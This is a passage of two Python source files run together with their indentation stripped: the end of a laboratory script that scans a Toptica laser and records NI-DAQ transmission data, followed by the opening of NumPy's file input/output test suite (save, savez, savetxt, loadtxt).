while _lbdscan[-1] <= lim[1] + self._stop_shift:# or not(lsr._lim[0] <= _lbdscan[-1] <= lsr._lim[1]):
_lbdscan += [lsr.lbd]
print('\t lbd: {:.3f}'.format(_lbdscan[-1]), end = '\r')
time.sleep(0.001)
lsr.scan = False
self._daqScanning = False
t2 = time.time()
print('\t lbd: {:.3f}'.format(lsr.lbd))
print('-'*20 + 'End Scan')
t_end = t2-t1
print("\tTime taken for scan: {}s".format(t_end))
while not self._done_get_data:
print('Waiting for the DAQ data', end = '\r')
T = self.data[0]
MZ = self.data[1]
t_daq = np.linspace(0,self.time_end_daq-self.time_start_daq, T.size)
_lbdscan = np.array(_lbdscan)
t_scan = np.linspace(0, t_end, _lbdscan.size)
lbdscan = np.interp(t_daq, t_scan,_lbdscan)
ind = np.where(t_daq<=t_end)
t_daq = t_daq[ind]
T = T[ind]
MZ= MZ[ind]
lbdscan = lbdscan[ind]
# -- Get Input and Output Power --
# --------------------------------------------------------
if self.Pmeter_in:
self.Pmeter_in.lbd = 1050
Pin = self.Pmeter_in.read*self.Pin_ratio
Pin = 10*np.log10(Pin*1e3)
# self.Pmeter_in._instr.close()
print('-'*30)
print('Power:')
print('\tInput Power {:.3f}dBm'.format(Pin))
if self.Pmeter_out:
self.Pmeter_out.lbd = 1050
Pout = self.Pmeter_out.read*self.Pout_ratio
Pout = 10*np.log10(Pout*1e3)
# self.Pmeter_out._instr.close()
print('\tOutput Power {:.3f}dBm'.format(Pout))
print('\tInsertion losses: {:.3f}dB'.format(Pin-Pout))
else:
Pout = None
elif self.Pmeter_out:
Pin = None
self.Pmeter_out.lbd = 1050
Pout = self.Pmeter_out.read/self.Pout_ratio
Pout = 10*np.log10(Pout*1e3)
# self.Pmeter_out._instr.close()
print('\tOutput Power {:.3f}dBm'.format(Pout))
print('\tInsertion losses: {:.3f}dB'.format(Pin-Pout))
else:
Pin = None
Pout = None
if wlm:
wlm.pulsemode = False
wlm.widemode = False
wlm.fastmode = False
wlm.channel = self.wavemeter_ch
wlm.exposure = 'auto'
wlm.acquire = True
print('-'*30)
print('Getting Wavemeter for End Wavelength:')
time.sleep(2.5)
lbd_stop = wlm.lbd
wlm.acquire = False
print("\tWavelength End {:.3f}".format(lbd_stop))
else:
lbd_stop = lsr.lbd
# downsample the data
dataT = np.array([lbdscan, T]).T
dataMZ = np.array([lbdscan, MZ]).T
# ipdb.set_trace()
if self.sub >1:
dataTsmall = np.array([lbdscan[::self.sub], T[::self.sub]]).T
dataMZsmall = np.array([lbdscan[::self.sub], MZ[::self.sub]]).T
else:
dataTsmall = dataT
dataMZsmall = dataMZ
# # -- Dictionarry of full data --
# --------------------------------------------------------
full_data = {'lbd_start': lbd_start,
'lbd_stop': lbd_stop,
'lbd_scan': lbdscan,
'T': T,
'MZ': MZ,
'tdaq': t_daq,
'Pin': Pin,
'Pout': Pout}
# # f, ax = plt.subplots()
trace0 = go.Scatter(
x = dataTsmall[:,0],
y = dataTsmall[:,1]/dataTsmall[:,1].max(),
mode = 'lines',
name = 'T')
trace1 = go.Scatter(
x = dataMZsmall[:,0],
y = dataMZsmall[:,1]/dataMZsmall[:,1].max(),
mode = 'lines',
name = 'MZ')
data = [trace1, trace0]
layout = dict(xaxis = dict(title = 'Wavelength (nm)'),
yaxis = dict(title = 'Signal (V)', rangemode = 'tozero'),
)
print('figure')
fig = go.Figure(data=data, layout=layout)
print('displaying figure')
iplot(fig)
# ax.plot(MZ[::100])
# ax.plot(T[::100])
# f.show()
# # lbd, T_cal = MZCalibrate(full_data, 42649513.76655776)
# self.f, self.ax = plt.subplots()
# self.ax.plot(lbd*1e9,T_cal)
# self.f.show()
return full_data
class FreeRun():
def __init__(self,**kwargs):
self.daq_ch = kwargs.get('daq_ch', 'ai0')
self.daq_dev = kwargs.get('daq_dev', 'Dev1')
self.lsr = kwargs.get('laser', None)
def run(self):
# -- set the laser piezo --
clk = 0.1e6
T = 1/20
# _laser = self.lsr
Npts = T*clk * 2
# -- define the writting signal --
t= np.linspace(0, 2*T, Npts)
# -- setup the daq --
dev = self.daq_dev
ch = self.daq_ch
system = nidaqmx.system.System.local()
device = system.devices[dev]
device.reset_device()
if not type(ch)==list:
ch = [ch]
ch_read = dev + '/' + ',{}/'.format(dev).join(ch)
# ch_read = ch_read + ',{}/{}'.format(dev,self.daq_probe)
# -- Define the daq worker --
def FetchDAQ(clk, Npts,dev, ch_read):
readtask = nidaqmx.Task()
# print(ch_read)
readtask.ai_channels.add_ai_voltage_chan(ch_read,min_val=0, max_val=5)
readtask.timing.cfg_samp_clk_timing(clk, sample_mode=AcquisitionType.CONTINUOUS, samps_per_chan=int(Npts))
data = readtask.read(number_of_samples_per_channel=int(Npts))
readtask.close()
return data
# -- Define the Animation for Matplotlib --
class MyDataFetchClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
# self._data = dataClass
self._period = 2*T+0.1
self._nextCall = time.time()
self._run = True
self.clk = clk
self.X = [[0,2*T]]
self.Y = [[0, 5]]
f, ax = plt.subplots()
self.hLine = []
self.hLine += ax.plot(self.X,self.Y)
f.show()
self.ani = FuncAnimation(f, self.update, frames = 2000000,interval = 10)
self.f_num = f.number
# self.lsr = _laser
def update(self, i):
for ii in range(len(self.X)):
self.hLine[ii].set_data(self.X[ii], self.Y[ii])
def run(self):
while True:
nt = int(Npts/2)
data = FetchDAQ(clk, Npts,dev, ch_read)
Trans = np.array(data[0])
self.X = [t]
self.Y = [Trans]
fetcher = MyDataFetchClass()
# fetcher.daemon = True
fetcher.start()
# interact(Slide, x= widgets.FloatSlider(min=0,max=100, step = 0.01))
def PiezoSlide(lsr):
def SlidePiezo(x):
lsr.pzt = x
_= interact(SlidePiezo, x= widgets.FloatSlider(description='Piezo:',min=0,max=100, step = 0.01, layout=Layout(width='100%')))
class PiezoScan():
def __init__(self, **kwargs):
self.lsr = kwargs.get('laser', None)
self.Vmax = kwargs.get('Vmax', 140)
self.Vmin = kwargs.get('Vmin', 140)
self.Vcoeff = kwargs.get('Vcoeff', 23)
self.daq_ch = kwargs.get('daq_ch', 'ai0')
self.daq_write = kwargs.get('daq_write', 'ao0')
self.daq_probe = kwargs.get('daq_probe', 'ai16')
self.daq_dev = kwargs.get('daq_dev', 'Dev1')
self.freq_scan = kwargs.get('freq_scan', 20)
self.pzt_center = kwargs.get('pzt_center', 0)
def Triangle(self, T, Npts):
clk = 0.75e6
Vmax = self.Vmax/self.Vcoeff
Vmin = self.Vmin/self.Vcoeff
t = np.linspace(0, 2*T, Npts)
down = lambda x : x *(Vmin-Vmax)/(T*0.5) + Vmax
up = lambda x : x *(Vmax-Vmin)/(T*0.5)
t = np.linspace(0, 2*T, Npts)
x = t[np.where(t<T/2)]
ydown = list(down(x))
yup = list(up(x))
y = ydown + yup
to_add = int(t.size/4)
y = list(np.zeros(to_add)) + y + list(np.zeros(to_add))
return (t, np.array(y))
# ipdb.set_trace()
# assert len(y) == len(t)
return (t, np.array(y))
def Slope(self, T, Npts):
clk = 0.75e6
Vmax = self.Vmax/self.Vcoeff
Vmin = self.Vmin
t = np.linspace(0, 2*T, Npts)
up = lambda x : -x *(Vmax-Vmin)/T + Vmax
t = np.linspace(0, 2*T, Npts)
x = t[np.where(t<=T)]
yup = list(up(x))
y = yup
to_add = int(t.size/4)
y = list(np.zeros(to_add)) + y + list(np.zeros(to_add))
return (t, np.array(y))
# ipdb.set_trace()
# assert len(y) == len(t)
return (t, np.array(y))
def run(self):
# -- set the laser piezo --
self.lsr.pzt = self.pzt_center
Vmax = self.Vmax/self.Vcoeff
Vmin = self.Vmin/self.Vcoeff
Vcoeff = self.Vcoeff
clk = 0.1e6
T = 1/self.freq_scan
Npts = T*clk * 2
# -- define the writting signal --
t, write = self.Slope(T, Npts)
ind_T = np.where(t<=T)[0][-1]
# -- setup the daq --
dev = self.daq_dev
ch = self.daq_ch
system = nidaqmx.system.System.local()
device = system.devices[dev]
device.reset_device()
if not type(ch)==list:
ch = [ch]
ch_read = dev + '/' + ',{}/'.format(dev).join(ch)
ch_read = ch_read + ',{}/{}'.format(dev,self.daq_probe)
ch_write = self.daq_write
# -- Define the daq worker --
def WriteAndFetchDAQ(clk, Npts,dev, ch_read, ch_write):
readtask = nidaqmx.Task()
# print(ch_read)
readtask.ai_channels.add_ai_voltage_chan(ch_read,min_val=-0.5, max_val=6)
readtask.timing.cfg_samp_clk_timing(clk, sample_mode=AcquisitionType.CONTINUOUS, samps_per_chan=int(Npts))
writetask = nidaqmx.Task()
writetask.ao_channels.add_ao_voltage_chan("{}/{}".format(dev, ch_write))
writetask.timing.cfg_samp_clk_timing(int(clk),
sample_mode=AcquisitionType.CONTINUOUS,
samps_per_chan=int(Npts))
writetask.write(write, auto_start=False)
writetask.start()
data = readtask.read(number_of_samples_per_channel=int(Npts))
readtask.close()
writetask.close()
return data
# -- Define the Animation for Matplotlib --
class MyDataFetchClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
# self._data = dataClass
self._period = 2*T+0.1
self._nextCall = time.time()
self._run = True
self.clk = clk
self.X = [[0, self._period/2]]
self.Y = [[0, Vmax]]
f, ax = plt.subplots()
self.hLine = []
x = np.linspace(0, t[-1], write.size)
self.hLine += ax.plot(x,write)
self.hLine += ax.plot(x, write)
f.show()
self.ani = FuncAnimation(f, self.update, frames = 2000000,interval = 20)
self.f_num = f.number
def update(self, i):
x = np.linspace(0, t[-1], write.size)
for ii in range(len(self.X)):
self.hLine[ii].set_data(x, self.Y[ii])
def run(self):
while True:
if plt.fignum_exists(self.f_num):
nt = int(Npts/2)
data = WriteAndFetchDAQ(clk, Npts,dev, ch_read, ch_write)
Trans = np.array(data[0])
probe = np.array(data[2])
self.X = [probe*Vcoeff]
self.Y = [Trans]
else:
print('stop')
break
fetcher = MyDataFetchClass()
fetcher.start()
def ReadPmeter(Pmeter, ratio):
pass
# while True:
# if msvcrt.kbhit():
# if ord(msvcrt.getch()) == 27:
# break
# else:
#
# print("Power Read: {:.3f}uW".format(Pmeter.read*1e6 *ratio), end = "\r")
def SaveDCdata(data, path,fname):
fname = path + fname
h5f = h5py.File('{}.h5'.format(fname), 'w')
h5f.create_dataset('lbd_start', data=[data['lbd_start']])
h5f.create_dataset('lbd_stop', data=[data['lbd_stop']])
h5f.create_dataset('lbd_scan', data=[data['lbd_scan']])
h5f.create_dataset('T', data=data['T'])
h5f.create_dataset('MZ', data=data['MZ'])
h5f.create_dataset('tdaq', data=data['tdaq'])
if data['Pin'] == None:
h5f.create_dataset('Pin', data=[0])
else:
h5f.create_dataset('Pin', data=[data['Pin']])
if data['Pout'] == None:
h5f.create_dataset('Pout', data=[0])
else:
h5f.create_dataset('Pout', data=[data['Pout']])
if __name__ =="__main__":
lsr = Toptica1050()
lsr.connected = True
lsr.scan_limit = [1020, 1070]
lsr.scan_speed = 4
daq_ch = ['ai0', 'ai23']
# daq_ch = ['ai22']
# wlm = Wavemeter()
# Pmeter_in = ThorlabsP1xx(address='USB0::0x1313::0x807B::17121241::INSTR')
# Pmeter_out = ThorlabsP1xx(address='USB0::0x1313::0x8072::P2009986::INSTR')
Piezo = PiezoScan(laser = lsr,daq_ch = daq_ch, daq_dev = 'Dev3',
daq_probe = 'ai16', daq_write = 'ao0' )
Free = FreeRun(laser = lsr,daq_ch = ['ai0'], daq_dev = 'Dev3',)
DC = TopticaWorker(laser = lsr, wavemeter = None,
daq_ch = daq_ch, daq_dev = 'Dev3',
Pmeter_in = None, Pmeter_out = None,
Pin_ratio= 10, Pout_ratio= 10)
# data = work.run()
# path = 'Z:/Microcombs/ACES/Measurement/20180504-TemperatureMeasurement'
# fname = 'LigentechG3_1b11_RW810G520_600mW'
# # io.savemat(path + '/' + fname + '.mat', data)
# plt.close('all')
#
|
test_io.py | from __future__ import division, absolute_import, print_function
import sys
import gzip
import os
import threading
import time
import warnings
import io
import re
import pytest
from tempfile import NamedTemporaryFile
from io import BytesIO, StringIO
from datetime import datetime
import locale
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConversionWarning
from numpy.compat import asbytes, bytes, Path
from numpy.ma.testutils import assert_equal
from numpy.testing import (
assert_warns, assert_, assert_raises_regex, assert_raises,
assert_allclose, assert_array_equal, temppath, tempdir, IS_PYPY,
HAS_REFCOUNT, suppress_warnings, assert_no_gc_cycles, assert_no_warnings
)
class TextIO(BytesIO):
"""Helper IO class.
Writes encode strings to bytes if needed, reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
MAJVER, MINVER = sys.version_info[:2]
IS_64BIT = sys.maxsize > 2**32
try:
import bz2
HAS_BZ2 = True
except ImportError:
HAS_BZ2 = False
try:
import lzma
HAS_LZMA = True
except ImportError:
HAS_LZMA = False
def strptime(s, fmt=None):
"""
This function is available in the datetime module only from Python >=
2.5.
"""
if type(s) == bytes:
s = s.decode("latin1")
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {"allow_pickle": True})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
target_file = NamedTemporaryFile(delete=False)
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
try:
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
finally:
if not isinstance(target_file, BytesIO):
target_file.close()
# holds an open file descriptor so it can't be deleted on win
if 'arr_reloaded' in locals():
if not isinstance(arr_reloaded, np.lib.npyio.NpzFile):
os.remove(target_file.name)
def check_roundtrips(self, a):
self.roundtrip(a)
self.roundtrip(a, file_on_disk=True)
self.roundtrip(np.asfortranarray(a))
self.roundtrip(np.asfortranarray(a), file_on_disk=True)
if a.shape[0] > 1:
# neither C nor Fortran contiguous for 2D arrays or more
self.roundtrip(np.asfortranarray(a)[1:])
self.roundtrip(np.asfortranarray(a)[1:], file_on_disk=True)
def test_array(self):
a = np.array([], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], int)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.check_roundtrips(a)
def test_array_object(self):
a = np.array([], object)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], object)
self.check_roundtrips(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@pytest.mark.skipif(sys.platform == 'win32', reason="Fails on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
a = np.asfortranarray([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.check_roundtrips(a)
@pytest.mark.slow
def test_format_2_0(self):
dt = [(("%d" % i) * 100, float) for i in range(500)]
a = np.ones(1000, dtype=dt)
with warnings.catch_warnings(record=True):
warnings.filterwarnings('always', '', UserWarning)
self.check_roundtrips(a)
class TestSaveLoad(RoundtripTest):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
assert_equal(self.arr[0].dtype, self.arr_reloaded.dtype)
assert_equal(self.arr[0].flags.fnc, self.arr_reloaded.flags.fnc)
class TestSavezLoad(RoundtripTest):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
try:
for n, arr in enumerate(self.arr):
reloaded = self.arr_reloaded['arr_%d' % n]
assert_equal(arr, reloaded)
assert_equal(arr.dtype, reloaded.dtype)
assert_equal(arr.flags.fnc, reloaded.flags.fnc)
finally:
# delete tempfile, must be done here on windows
if self.arr_reloaded.fid:
self.arr_reloaded.fid.close()
os.remove(self.arr_reloaded.fid.name)
@pytest.mark.skipif(not IS_64BIT, reason="Needs 64bit platform")
@pytest.mark.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
a = np.empty(L, dtype=np.uint8)
with temppath(prefix="numpy_test_big_arrays_", suffix=".npz") as tmp:
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a'] # Should succeed
npfile.close()
del a # Avoid pyflakes unused variable warning.
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_BagObj(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(sorted(dir(l.f)), ['file_a','file_b'])
assert_equal(a, l.f.file_a)
assert_equal(b, l.f.file_b)
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
with temppath(suffix='.npz') as tmp:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify could seek on 'loaded' file
with temppath(suffix='.npz') as tmp:
with open(tmp, 'wb') as fp:
np.savez(fp, data='LOVELY LOAD')
with open(tmp, 'rb', 10000) as fp:
fp.seek(0)
assert_(not fp.closed)
np.load(fp)['data']
# fp must not get closed by .load
assert_(not fp.closed)
fp.seek(0)
assert_(not fp.closed)
#FIXME: Is this still true?
@pytest.mark.skipif(IS_PYPY, reason="Missing context manager on PyPy")
def test_closing_fid(self):
# Test that issue #1517 (too many opened files) remains closed
# It might be a "weak" test since failed to get triggered on
# e.g. Debian sid of 2012 Jul 05 but was reported to
# trigger the failure on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
with temppath(suffix='.npz') as tmp:
np.savez(tmp, data='LOVELY LOAD')
# We need to check if the garbage collector can properly close
# numpy npz file returned by np.load when their reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings. Because ResourceWarning
# is unknown in Python < 3.x, we take the easy way out and
# catch all warnings.
with suppress_warnings() as sup:
sup.filter(Warning) # TODO: specify exact message
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
def test_closing_zipfile_after_load(self):
# Check that zipfile owns file and can close it. This needs to
# pass a file name to load for the test. On windows failure will
# cause a second error will be raised when the attempt to remove
# the open file is made.
prefix = 'numpy_test_closing_zipfile_after_load_'
with temppath(suffix='.npz', prefix=prefix) as tmp:
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt(object):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_0D_3D(self):
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, np.array(1))
assert_raises(ValueError, np.savetxt, c, np.array([[[1], [2]]]))
def test_structured(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_structured_padded(self):
# gh-13297
a = np.array([(1, 2, 3),(4, 5, 6)], dtype=[
('foo', 'i4'), ('bar', 'i4'), ('baz', 'i4')
])
c = BytesIO()
np.savetxt(c, a[['foo', 'baz']], fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 3\n', b'4 6\n'])
@pytest.mark.skipif(Path is None, reason="No pathlib.Path")
def test_multifield_view(self):
a = np.ones(1, dtype=[('x', 'i4'), ('y', 'i4'), ('z', 'f4')])
v = a[['x', 'z']]
with temppath(suffix='.npy') as path:
path = Path(path)
np.save(path, v)
data = np.load(path)
assert_array_equal(data, v)
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overridden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Bad fmt, should raise a ValueError
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, a, fmt=99)
def test_header_footer(self):
# Test the functionality of the header and footer keyword argument.
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
with temppath() as name:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def test_complex_negative_exponent(self):
# Previous to 1.15, some formats generated x+-yj, gh 7895
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re - 1.0j * im
c = BytesIO()
np.savetxt(c, a, fmt='%.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n',
b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n'])
def test_custom_writer(self):
class CustomWriter(list):
def write(self, text):
self.extend(text.split(b'\n'))
w = CustomWriter()
a = np.array([(1, 2), (3, 4)])
np.savetxt(w, a)
b = np.loadtxt(w)
assert_array_equal(a, b)
def test_unicode(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode)
with tempdir() as tmpdir:
# set encoding as on windows it may not be unicode even on py3
np.savetxt(os.path.join(tmpdir, 'test.csv'), a, fmt=['%s'],
encoding='UTF-8')
def test_unicode_roundtrip(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode)
# our gz wrapper support encoding
suffixes = ['', '.gz']
# stdlib 2 versions do not support encoding
if MAJVER > 2:
if HAS_BZ2:
suffixes.append('.bz2')
if HAS_LZMA:
suffixes.extend(['.xz', '.lzma'])
with tempdir() as tmpdir:
for suffix in suffixes:
np.savetxt(os.path.join(tmpdir, 'test.csv' + suffix), a,
fmt=['%s'], encoding='UTF-16-LE')
b = np.loadtxt(os.path.join(tmpdir, 'test.csv' + suffix),
encoding='UTF-16-LE', dtype=np.unicode)
assert_array_equal(a, b)
def test_unicode_bytestream(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode)
s = BytesIO()
np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
s.seek(0)
assert_equal(s.read().decode('UTF-8'), utf8 + '\n')
def test_unicode_stringstream(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode)
s = StringIO()
np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
s.seek(0)
assert_equal(s.read(), utf8 + '\n')
@pytest.mark.parametrize("fmt", [u"%f", b"%f"])
@pytest.mark.parametrize("iotype", [StringIO, BytesIO])
def test_unicode_and_bytes_fmt(self, fmt, iotype):
# string type of fmt should not matter, see also gh-4053
a = np.array([1.])
s = iotype()
np.savetxt(s, a, fmt=fmt)
s.seek(0)
if iotype is StringIO:
assert_equal(s.read(), u"%f\n" % 1.)
else:
assert_equal(s.read(), b"%f\n" % 1.)
@pytest.mark.skipif(sys.platform=='win32',
reason="large files cause problems")
@pytest.mark.slow
def test_large_zip(self):
# The test takes at least 6GB of memory, writes a file larger than 4GB
try:
a = 'a' * 6 * 1024 * 1024 * 1024
del a
except (MemoryError, OverflowError):
pytest.skip("Cannot allocate enough memory for test")
test_data = np.asarray([np.random.rand(np.random.randint(50,100),4)
for i in range(800000)])
with tempdir() as tmpdir:
np.savez(os.path.join(tmpdir, 'test.npz'), test_data=test_data)
class LoadTxtBase(object):
def check_compressed(self, fopen, suffixes):
# Test that we can load data from a compressed file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
for suffix in suffixes:
with temppath(suffix=suffix) as name:
with fopen(name, mode='wt', encoding='UTF-32-LE') as f:
f.write(data)
res = self.loadfunc(name, encoding='UTF-32-LE')
assert_array_equal(res, wanted)
with fopen(name, "rt", encoding='UTF-32-LE') as f:
res = self.loadfunc(f)
assert_array_equal(res, wanted)
# Python2 .open does not support encoding
@pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
def test_compressed_gzip(self):
self.check_compressed(gzip.open, ('.gz',))
@pytest.mark.skipif(not HAS_BZ2, reason="Needs bz2")
@pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
def test_compressed_bz2(self):
self.check_compressed(bz2.open, ('.bz2',))
@pytest.mark.skipif(not HAS_LZMA, reason="Needs lzma")
@pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
def test_compressed_lzma(self):
self.check_compressed(lzma.open, ('.xz', '.lzma'))
def test_encoding(self):
with temppath() as path:
with open(path, "wb") as f:
f.write('0.\n1.\n2.'.encode("UTF-16"))
x = self.loadfunc(path, encoding="UTF-16")
assert_array_equal(x, [0., 1., 2.])
def test_stringload(self):
# umlaute
